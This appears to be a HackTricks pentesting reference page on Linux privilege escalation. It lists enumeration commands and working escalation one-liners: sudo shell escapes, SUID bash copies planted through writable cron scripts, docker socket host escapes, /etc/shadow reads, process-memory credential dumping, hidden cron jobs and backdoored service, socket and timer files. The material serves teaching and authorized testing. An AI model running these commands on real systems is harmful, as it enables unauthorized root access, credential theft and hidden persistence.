HackTricks
Search…
Pentesting
Powered By GitBook
Linux Privilege Escalation
Do you use Hacktricks every day? Did you find the book very useful? Would you like to receive extra help with cybersecurity questions? Would you like to find more and higher quality content on Hacktricks? Support Hacktricks through github sponsors so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!
If you want to know about my latest modifications/additions or you have any suggestion for HackTricks or PEASS, join the 💬telegram group, or follow me on Twitter 🐦@carlospolopm. If you want to share some tricks with the community you can also submit pull requests to https://github.com/carlospolop/hacktricks that will be reflected in this book and don't forget to give ⭐ on github to motivate me to continue developing this book.

System Information

OS info

Let's starting gaining some knowledge of the OS running
1
(cat /proc/version || uname -a ) 2>/dev/null
2
lsb_release -a 2>/dev/null
Copied!

Path

If you have write permissions on any folder inside the PATH variable you may be able to hijacking some libraries or binaries:
1
echo $PATH
Copied!

Env info

Interesting information, passwords or API keys in the environment variables?
1
(env || set) 2>/dev/null
Copied!

Kernel exploits

Check the kernel version and if there is some exploit that can be used to escalate privileges
1
cat /proc/version
2
uname -a
3
searchsploit "Linux Kernel"
Copied!
You can find a good vulnerable kernel list and some already compiled exploits here: https://github.com/lucyoa/kernel-exploits and exploitdb sploits. Other sites where you can find some compiled exploits: https://github.com/bwbwbwbw/linux-exploit-binaries, https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack
To extract all the vulnerable kernel versions from that web you can do:
1
curl https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/README.md 2>/dev/null | grep "Kernels: " | cut -d ":" -f 2 | cut -d "<" -f 1 | tr -d "," | tr ' ' '\n' | grep -v "^\d\.\dquot; | sort -u -r | tr '\n' ' '
Copied!
Tools that could help searching for kernel exploits are:
linux-exploit-suggester.sh linux-exploit-suggester2.pl linuxprivchecker.py (execute IN victim,only checks exploits for kernel 2.x)
Always search the kernel version in Google, maybe your kernel version is wrote in some kernel exploit and then you will be sure that this exploit is valid.

CVE-2016-5195 (DirtyCow)

Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8
1
# make dirtycow stable
2
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
3
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
4
https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
5
https://github.com/evait-security/ClickNRoot/blob/master/1/exploit.c
Copied!

Sudo version

Based on the vulnerable sudo versions that appear in:
1
searchsploit sudo
Copied!
You can check if the sudo version is vulnerable using this grep.
1
sudo -V | grep "Sudo ver" | grep "1\.[01234567]\.[0-9]\+\|1\.8\.1[0-9]\*\|1\.8\.2[01234567]"
Copied!

sudo <= v1.28

From @sickrov
1
sudo -u#-1 /bin/bash
Copied!

Dmesg signature verification failed

Check smasher2 box of HTB for an example of how this vuln could be exploited
1
dmesg 2>/dev/null | grep "signature"
Copied!

More system enumeration

1
date 2>/dev/null #Date
2
(df -h || lsblk) #System stats
3
lscpu #CPU info
4
lpstat -a 2>/dev/null #Printers info
Copied!

Enumerate possible defenses

AppArmor

1
if [ `which aa-status 2>/dev/null` ]; then
2
aa-status
3
elif [ `which apparmor_status 2>/dev/null` ]; then
4
apparmor_status
5
elif [ `ls -d /etc/apparmor* 2>/dev/null` ]; then
6
ls -d /etc/apparmor*
7
else
8
echo "Not found AppArmor"
9
fi
Copied!

Grsecurity

1
((uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo "Not found grsecurity")
Copied!

PaX

1
(which paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo "Not found PaX")
Copied!

Execshield

1
(grep "exec-shield" /etc/sysctl.conf || echo "Not found Execshield")
Copied!

SElinux

1
(sestatus 2>/dev/null || echo "Not found sestatus")
Copied!

ASLR

1
cat /proc/sys/kernel/randomize_va_space 2>/dev/null
2
#If 0, not enabled
Copied!

Docker Breakout

If you are inside a docker container you can try to escape from it:

Drives

Check what is mounted and unmounted, where and why. If anything is unmounted you could try to mount it and check for private info
1
ls /dev 2>/dev/null | grep -i "sd"
2
cat /etc/fstab 2>/dev/null | grep -v "^#" | grep -Pv "\W*\#" 2>/dev/null
3
#Check if credentials in fstab
4
grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null
Copied!

Installed Software

Useful software

Enumerate useful binaries
1
which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null
Copied!
Also, check if any compiler is installed. This is useful if you need to use some kernel exploit as it's recommended to compile it in the machine where you are going to use it (or in one similar)
1
(dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; which gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+quot; 2>/dev/null | grep -v "/doc/")
Copied!

Vulnerable Software Installed

Check for the version of the installed packages and services. Maybe there is some old Nagios version (for example) that could be exploited for escalating privileges… It is recommended to check manually the version of the more suspicious installed software.
1
dpkg -l #Debian
2
rpm -qa #Centos
Copied!
If you have SSH access to the machine you could also use openVAS to check for outdated and vulnerable software installed inside the machine.
Note that these commands will show a lot of information that will mostly be useless, therefore it's recommended some application like OpenVAS or similar that will check if any installed software version is vulnerable to known exploits

Processes

Take a look to what processes are being executed and check if any process has more privileges than it should (maybe a tomcat being executed by root?)
1
ps aux
2
ps -ef
3
top -n 1
Copied!
Always check for possible electron/cef/chromium debuggers running, you could abuse it to escalate privileges. Linpeas detect those by checking the --inspect parameter inside the command line of the process. Also check your privileges over the processes binaries, maybe you can overwrite someone.

Process monitoring

You can use tools like pspy to monitor processes. This can be very useful to identify vulnerable processes being executed frequently or when a set of requirements are met.

Process memory

Some services of a server save credentials in clear text inside the memory. Normally you will need root privileges to read the memory of processes that belong to other users, therefore this is usually more useful when you are already root and want to discover more credentials. However, remember that as a regular user you can read the memory of the processes you own.

GDB

If you have access to the memory of a FTP service (for example) you could get the Heap and search inside of it the credentials.
1
gdb -p <FTP_PROCESS_PID>
2
(gdb) info proc mappings
3
(gdb) q
4
(gdb) dump memory /tmp/mem_ftp <START_HEAD> <END_HEAD>
5
(gdb) q
6
strings /tmp/mem_ftp #User and password
Copied!

GDB Script

dump-memory.sh
1
#!/bin/bash
2
#./dump-memory.sh <PID>
3
grep rw-p /proc/$1/maps \
4
| sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' \
5
| while read start stop; do \
6
gdb --batch --pid $1 -ex \
7
"dump memory $1-$start-$stop.dump 0x$start 0x$stop"; \
8
done
Copied!

/proc/$pid/maps & /proc/$pid/mem

For a given process ID, maps shows how memory is mapped within that processes' virtual address space; it also shows the permissions of each mapped region. The mem pseudo file exposes the processes memory itself. From the maps file we know which memory regions are readable and their offsets. We use this information to seek into the mem file and dump all readable regions to a file.
1
procdump()
2
(
3
cat /proc/$1/maps | grep -Fv ".so" | grep " 0 " | awk '{print $1}' | ( IFS="-"
4
while read a b; do
5
dd if=/proc/$1/mem bs=$( getconf PAGESIZE ) iflag=skip_bytes,count_bytes \
6
skip=$(( 0x$a )) count=$(( 0x$b - 0x$a )) of="$1_mem_$a.bin"
7
done )
8
cat $1*.bin > $1.dump
9
rm $1*.bin
10
)
Copied!

/dev/mem

/dev/mem provides access to the system's physical memory, not the virtual memory. The kernels virtual address space can be accessed using /dev/kmem. Typically, /dev/mem is only readable by root and kmem group.
1
strings /dev/mem -n10 | grep -i PASS
Copied!

Tools

To dump a process memory you could use:

Credentials from Process Memory

Manual example

If you find that the authenticator process is running:
1
ps -ef | grep "authenticator"
2
root 2027 2025 0 11:46 ? 00:00:00 authenticator
Copied!
You can dump the process (see before sections to find different ways to dump the memory of a process) and search for credentials inside the memory:
1
./dump-memory.sh 2027
2
strings *.dump | grep -i password
Copied!

mimipenguin

The tool https://github.com/huntergregal/mimipenguin will steal clear text credentials from memory and from some well known files. It requires root privileges to work properly.
Feature
Process Name
GDM password (Kali Desktop, Debian Desktop)
gdm-password
Gnome Keyring (Ubuntu Desktop, ArchLinux Desktop)
gnome-keyring-daemon
LightDM (Ubuntu Desktop)
lightdm
VSFTPd (Active FTP Connections)
vsftpd
Apache2 (Active HTTP Basic Auth Sessions)
apache2
OpenSSH (Active SSH Sessions - Sudo Usage)
sshd:

Scheduled/Cron jobs

Check if any scheduled job is vulnerable. Maybe you can take advantage of a script being executed by root (wildcard vuln? can modify files that root uses? use symlinks? create specific files in the directory that root uses?).
1
crontab -l
2
ls -al /etc/cron* /etc/at*
3
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"
Copied!

Cron path

For example, inside /etc/crontab you can find the PATH: PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
(Note how the user "user" has writing privileges over /home/user)
If inside this crontab the root user tries to execute some command or script without setting the path. For example: * * * * root overwrite.sh Then, you can get a root shell by using:
1
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
2
#Wait cron job to be executed
3
/tmp/bash -p #The effective uid and gid to be set to the real uid and gid
Copied!

Cron using a script with a wildcard (Wildcard Injection)

If a script being executed by root has a “*” inside a command, you could exploit this to make unexpected things (like privesc). Example:
1
rsync -a *.sh rsync://host.back/src/rbd #You can create a file called "-e sh myscript.sh" so the script will execute our script
Copied!
If the wildcard is preceded of a path like /some/path/* , it's not vulnerable (even ./* is not).
Read the following page for more wildcard exploitation tricks:
If you can modify a cron script executed by root, you can get a shell very easily:
1
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > </PATH/CRON/SCRIPT>
2
#Wait until it is executed
3
/tmp/bash -p
Copied!
If the script executed by root uses a directory where you have full access, maybe it could be useful to delete that folder and create a symlink folder to another one serving a script controlled by you
1
ln -d -s </PATH/TO/POINT> </PATH/CREATE/FOLDER>
Copied!

Frequent cron jobs

You can monitor the processes to search for processes that are being executed every 1,2 or 5 minutes. Maybe you can take advantage of it and escalate privileges.
For example, to monitor every 0.1s during 1 minute, sort by less executed commands and deleting the commands that have beeing executed all the time, you can do:
1
for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; done; sort /tmp/monprocs.tmp | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort | grep -E -v "\s*[6-9][0-9][0-9]|\s*[0-9][0-9][0-9][0-9]"; rm /tmp/monprocs.tmp;
Copied!
You can also use pspy (this will monitor and list every process that start).

Invisible cron jobs

It's possible to create a cronjob putting a carriage return after a comment (without new line character), and the cron job will work. Example (note the carriege return char):
1
#This is a comment inside a cron config file\r* * * * * echo "Surprise!"
Copied!

Services

Writable .service files

Check if you can write any .service file, if you can, you could modify it so it executes your backdoor when the service is started, restarted or stopped (maybe you will need to wait until the machine is rebooted). For example create your backdoor inside the .service file with ExecStart=/tmp/script.sh

Writable service binaries

Keep in mid that if you have write permissions over binaries being executed by services, you can change them for backdoors so when the services get re-executed the backdoors will be executed.

systemd PATH - Relative Paths

You can see the PATH used by systemd with:
1
systemctl show-environment
Copied!
If you find that you can write in any of the folders of the path you may be able to escalate privileges. You need to search for relative paths being used on service configurations files like:
1
ExecStart=faraday-server
2
ExecStart=/bin/sh -ec 'ifup --allow=hotplug %I; ifquery --state %I'
3
ExecStop=/bin/sh "uptux-vuln-bin3 -stuff -hello"
Copied!
Then, create a executable with the same name as the relative path binary inside the systemd PATH folder you can write, and when the service is asked to execute the vulnerable action (Start, Stop, Reload), your backdoor will be executed (unprivileged users usually cannot start/stop services but check if you can using sudo -l).
Learn more about services with man systemd.service.

Timers

Timers are systemd unit files whose name ends in . timer that control . service files or events. Timers can be used as an alternative to cron. Timers have built-in support for calendar time events, monotonic time events, and can be run asynchronously.
You can enumerate all the timers doing:
1
systemctl list-timers --all
Copied!

Writable timers

If you can modify a timer you can make it execute some existent systemd.unit (like a .service or a .target)
1
Unit=backdoor.service
Copied!
In the documentation you can read what the Unit is:
The unit to activate when this timer elapses. The argument is a unit name, whose suffix is not ".timer". If not specified, this value defaults to a service that has the same name as the timer unit, except for the suffix. (See above.) It is recommended that the unit name that is activated and the unit name of the timer unit are named identically, except for the suffix.
Therefore, in order to abuse this permissions you would need to:
    Find some systemd unit (like a .service) that is executing a writable binary
    Find some systemd unit that is executing a relative path and you have writable privileges over the systemd PATH (to impersonate that executable)
Learn more about timers with man systemd.timer.

Enabling Timer

In order to enable a timer you need root privileges and to execute:
1
sudo systemctl enable backu2.timer
2
Created symlink /etc/systemd/system/multi-user.target.wants/backu2.timer → /lib/systemd/system/backu2.timer.
Copied!
Note the timer is activated by creating a symlink to it on /etc/systemd/system/<WantedBy_section>.wants/<name>.timer

Sockets

In brief, a Unix Socket (technically, the correct name is Unix domain socket, UDS) allows communication between two different processes on either the same machine or different machines in client-server application frameworks. To be more precise, it’s a way of communicating among computers using a standard Unix descriptors file. (From here).
Sockets can be configured using .socket files.
Learn more about sockets with man systemd.socket. Inside this file some several interesting parameters can be configured:
    ListenStream, ListenDatagram, ListenSequentialPacket, ListenFIFO, ListenSpecial, ListenNetlink, ListenMessageQueue, ListenUSBFunction: This options are different but as summary as used to indicate where is going to listen the socket (the path of the AF_UNIX socket file, the IPv4/6 and/or port number to listen...).
    Accept: Takes a boolean argument. If true, a service instance is spawned for each incoming connection and only the connection socket is passed to it. If false, all listening sockets themselves are passed to the started service unit, and only one service unit is spawned for all connections. This value is ignored for datagram sockets and FIFOs where a single service unit unconditionally handles all incoming traffic. Defaults to false. For performance reasons, it is recommended to write new daemons only in a way that is suitable for Accept=no.
    ExecStartPre, ExecStartPost: Takes one or more command lines, which are executed before or after the listening sockets/FIFOs are created and bound, respectively. The first token of the command line must be an absolute filename, then followed by arguments for the process.
    ExecStopPre, ExecStopPost: Additional commands that are executed before or after the listening sockets/FIFOs are closed and removed, respectively.
    Service: Specifies the service unit name to activate on incoming traffic. This setting is only allowed for sockets with Accept=no. It defaults to the service that bears the same name as the socket (with the suffix replaced). In most cases, it should not be necessary to use this option.

Writable .socket files

If you find a writable .socket file you can add at the beginning of the [Socket] section something like: ExecStartPre=/home/kali/sys/backdoor and the backdoor will be executed before the socket is created. Therefore, you will probably need to wait until the machine is rebooted. Note that the system must be using that socket file configuration or the backdoor won't be executed

Writable sockets

If you identify any writable socket (now where are talking about Unix Sockets, not about the config .socket files), then, you can communicate with that socket and maybe exploit a vulnerability.

Enumerate Unix Sockets

1
netstat -a -p --unix
Copied!

Raw connection

1
#apt-get install netcat-openbsd
2
nc -U /tmp/socket #Connect to UNIX-domain stream socket
3
nc -uU /tmp/socket #Connect to UNIX-domain datagram socket
4
5
#apt-get install socat
6
socat - UNIX-CLIENT:/dev/socket #connect to UNIX-domain socket, irrespective of its type
Copied!
Exploitation example:

HTTP sockets

Note that there may be some sockets listening for HTTP requests (I'm not talking about .socket files but about the files acting as unix sockets). You can check this with:
1
curl --max-time 2 --unix-socket /pat/to/socket/files http:/index
Copied!
If the socket respond with a HTTP request, then you can communicate with it and maybe exploit some vulnerability.

Writable Docker Socket

The docker socket is typically located at /var/run/docker.sock and is only writable by root user and docker group. If for some reason you have write permissions over that socket you can escalate privileges. The following commands can be used to escalate privileges:
1
docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash
2
docker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh
Copied!

Use docker web API from socket without docker package

If you have access to docker socket but you can't use the docker binary (maybe it isn't even installed), you can use directly the web API with curl.
The following commands are a example to create a docker container that mount the root of the host system and use socat to execute commands into the new docker.
1
# List docker images
2
curl -XGET --unix-socket /var/run/docker.sock http://localhost/images/json
3
##[{"Containers":-1,"Created":1588544489,"Id":"sha256:<ImageID>",...}]
4
# Send JSON to docker API to create the container
5
curl -XPOST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock -d '{"Image":"<ImageID>","Cmd":["/bin/sh"],"DetachKeys":"Ctrl-p,Ctrl-q","OpenStdin":true,"Mounts":[{"Type":"bind","Source":"/","Target":"/host_root"}]}' http://localhost/containers/create
6
##{"Id":"<NewContainerID>","Warnings":[]}
7
curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/<NewContainerID>/start
Copied!
The last step is to use socat to initiate a connection to the container, sending an attach request
1
socat - UNIX-CONNECT:/var/run/docker.sock
2
POST /containers/<NewContainerID>/attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
3
Host:
4
Connection: Upgrade
5
Upgrade: tcp
6
7
#HTTP/1.1 101 UPGRADED
8
#Content-Type: application/vnd.docker.raw-stream
9
#Connection: Upgrade
10
#Upgrade: tcp
Copied!
Now, you can execute commands on the container from this socat connection.

Others

Note that if you have write permissions over the docker socket because you are inside the group docker you have more ways to escalate privileges. If the docker API is listening in a port you can also be able to compromise it.

Containerd (ctr) privilege escalation

If you find that you can use the ctr command read the following page as you may be able to abuse it to escalate privileges:

RunC privilege escalation

If you find that you can use the runc command read the following page as you may be able to abuse it to escalate privileges:

D-Bus

D-BUS is an inter-process communication (IPC) system, providing a simple yet powerful mechanism allowing applications to talk to one another, communicate information and request services. D-BUS was designed from scratch to fulfil the needs of a modern Linux system.
D-BUS, as a full-featured IPC and object system, has several intended uses. First, D-BUS can perform basic application IPC, allowing one process to shuttle data to another—think UNIX domain sockets on steroids. Second, D-BUS can facilitate sending events, or signals, through the system, allowing different components in the system to communicate and ultimately to integrate better. For example, a Bluetooth dæmon can send an incoming call signal that your music player can intercept, muting the volume until the call ends. Finally, D-BUS implements a remote object system, letting one application request services and invoke methods from a different object—think CORBA without the complications. **(From here).
D-Bus uses an allow/deny model, where each message (method call, signal emission, etc.) can be allowed or denied according to the sum of all policy rules which match it. Each or rule in the policy should have the own, send_destination or receive_sender attribute set.
Part of the policy of /etc/dbus-1/system.d/wpa_supplicant.conf:
1
<policy user="root">
2
<allow own="fi.w1.wpa_supplicant1"/>
3
<allow send_destination="fi.w1.wpa_supplicant1"/>
4
<allow send_interface="fi.w1.wpa_supplicant1"/>
5
<allow receive_sender="fi.w1.wpa_supplicant1" receive_type="signal"/>
6
</policy>
Copied!
Therefore, if a policy is allowing your user in anyway to interact with the bus, you could be able to exploit it to escalate privileges (maybe just listing for some passwords?).
Note that a policy that doesn't specify any user or group affects everyone (<policy>). Policies to the context "default" affects everyone not affected by other policies (<policy context="default").
Learn how to enumerate and exploit a D-Bus communication here:

Network

It's always interesting to enumerate the network and figure out the position of the machine.

Generic enumeration

1
#Hostname, hosts and DNS
2
cat /etc/hostname /etc/hosts /etc/resolv.conf
3
dnsdomainname
4
5
#Content of /etc/inetd.conf & /etc/xinetd.conf
6
cat /etc/inetd.conf /etc/xinetd.conf
7
8
#Interfaces
9
cat /etc/networks
10
(ifconfig || ip a)
11
12
#Neighbours
13
(arp -e || arp -a)
14
(route || ip n)
15
16
#Iptables rules
17
(timeout 1 iptables -L 2>/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Pv "\W*\#" 2>/dev/null)
18
19
#Files used by network services
20
lsof -i
Copied!

Open ports

Always check network services running on the machine that you wasn't able to interact with before accessing to it:
1
(netstat -punta || ss --ntpu)
2
(netstat -punta || ss --ntpu) | grep "127.0"
Copied!

Sniffing

Check if you can sniff traffic. If you can, you could be able to grab some credentials.
1
timeout 1 tcpdump
Copied!

Users

Generic Enumeration

Check who you are, which privileges do you have, which users are in the systems, which ones can login and which ones have root privileges:
1
#Info about me
2
id || (whoami && groups) 2>/dev/null
3
#List all users
4
cat /etc/passwd | cut -d: -f1
5
#List users with console
6
cat /etc/passwd | grep "shquot;
7
#List superusers
8
awk -F: '($3 == "0") {print}' /etc/passwd
9
#Currently logged users
10
w
11
#Login history
12
last | tail
13
#Last log of each user
14
lastlog
15
16
#List all users and their groups
17
for i in $(cut -d":" -f1 /etc/passwd 2>/dev/null);do id $i;done 2>/dev/null | sort
18
#Current user PGP keys
19
gpg --list-keys 2>/dev/null
Copied!

Big UID

Some Linux versions were affected by a bug that allow users with UID > INT_MAX to escalate privileges. More info: here, here and here. Exploit it using: systemd-run -t /bin/bash

Groups

Check if you are a member of some group that could grant you root privileges:

Clipboard

Check if anything interesting is located inside the clipboard (if possible)
1
if [ `which xclip 2>/dev/null` ]; then
2
echo "Clipboard: "`xclip -o -selection clipboard 2>/dev/null`
3
echo "Highlighted text: "`xclip -o 2>/dev/null`
4
elif [ `which xsel 2>/dev/null` ]; then
5
echo "Clipboard: "`xsel -ob 2>/dev/null`
6
echo "Highlighted text: "`xsel -o 2>/dev/null`
7
else echo "Not found xsel and xclip"
8
fi
Copied!

Password Policy

1
grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs
Copied!

Known passwords

If you know any password of the environment try to login as each user using the password.

Su Brute

If don't mind about doing a lot of noise and su and timeout binaries are present on the computer you can try to brute-force user using su-bruteforce. Linpeas with -a parameter also try to brute-force users.

Writable PATH abuses

$PATH

If you find that you can write inside some folder of the $PATH you may be able to escalate privileges by creating a backdoor inside the writable folder with the name of some command that is going to be executed by a different user (root ideally) and that is not loaded from a folder that is located previous to your writable folder in $PATH.

SUDO and SUID

You could be allowed to execute some command using sudo or they could have the suid bit. Check it using:
1
sudo -l #Check commands you can execute with sudo
2
find / -perm -4000 2>/dev/null #Find all SUID binaries
Copied!
Some unexpected commands allows you to read and/or write files or even execute command. For example:
1
sudo awk 'BEGIN {system("/bin/sh")}'
2
sudo find /etc -exec sh -i \;
3
sudo tcpdump -n -i lo -G1 -w /dev/null -z ./runme.sh
4
sudo tar c a.tar -I ./runme.sh a
5
ftp>!/bin/sh
6
less>! <shell_comand>
Copied!

NOPASSWD

Sudo configuration might allow a user to execute some command with another user privileges without knowing the password.
1
$ sudo -l
2
User demo may run the following commands on crashlab:
3
(root) NOPASSWD: /usr/bin/vim
Copied!
In this example the user demo can run vim as root, it is now trivial to get a shell by adding an ssh key into the root directory or by calling sh.
1
sudo vim -c '!sh'
Copied!

SETENV

This directive allows the user to set an environment variable while executing something:
1
$ sudo -l
2
User waldo may run the following commands on admirer:
3
(ALL) SETENV: /opt/scripts/admin_tasks.sh
Copied!
This example, based on HTB machine Admirer, was vulnerable to PYTHONPATH hijacking in order to load an arbitrary python library while executing the script as root:
1
sudo PYTHONPATH=/dev/shm/ /opt/scripts/admin_tasks.sh
Copied!

Sudo execution bypassing paths

Jump to read other files or use symlinks. For example in sudeores file: hacker10 ALL= (root) /bin/less /var/log/*
1
sudo less /var/logs/anything
2
less>:e /etc/shadow #Jump to read other files using privileged less
Copied!
1
ln /etc/shadow /var/log/new
2
sudo less /var/log/new #Use symlinks to read any file
Copied!
If a wilcard is used (*), it is even easier:
1
sudo less /var/log/../../etc/shadow #Read shadow
2
sudo less /var/log/something /etc/shadow #Red 2 files
Copied!

Sudo command/SUID binary without command path

If the sudo permission is given to a single command without specifying the path: hacker10 ALL= (root) less you can exploit it by changing the PATH variable
1
export PATH=/tmp:$PATH
2
#Put your backdoor in /tmp and name it "less"
3
sudo less
Copied!
This technique can also be used if a suid binary executes another command without specifying the path to it (always check with strings the content of a weird SUID binary).